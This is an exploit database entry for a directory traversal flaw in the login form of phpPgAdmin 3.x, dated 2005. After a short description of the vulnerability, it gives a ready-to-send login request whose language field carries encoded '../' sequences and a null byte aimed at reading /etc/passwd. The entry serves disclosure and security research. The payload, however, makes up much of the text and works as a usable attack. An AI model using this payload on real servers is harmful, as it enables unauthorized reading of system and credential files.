phpPgAdmin 3.x - Login Form Directory Traversal

EDB-ID:

25938




Platform:

PHP

Date:

2005-07-05


source: https://www.securityfocus.com/bid/14142/info

phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form.

All versions of phpPgAdmin are considered to be vulnerable at the moment. 

formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login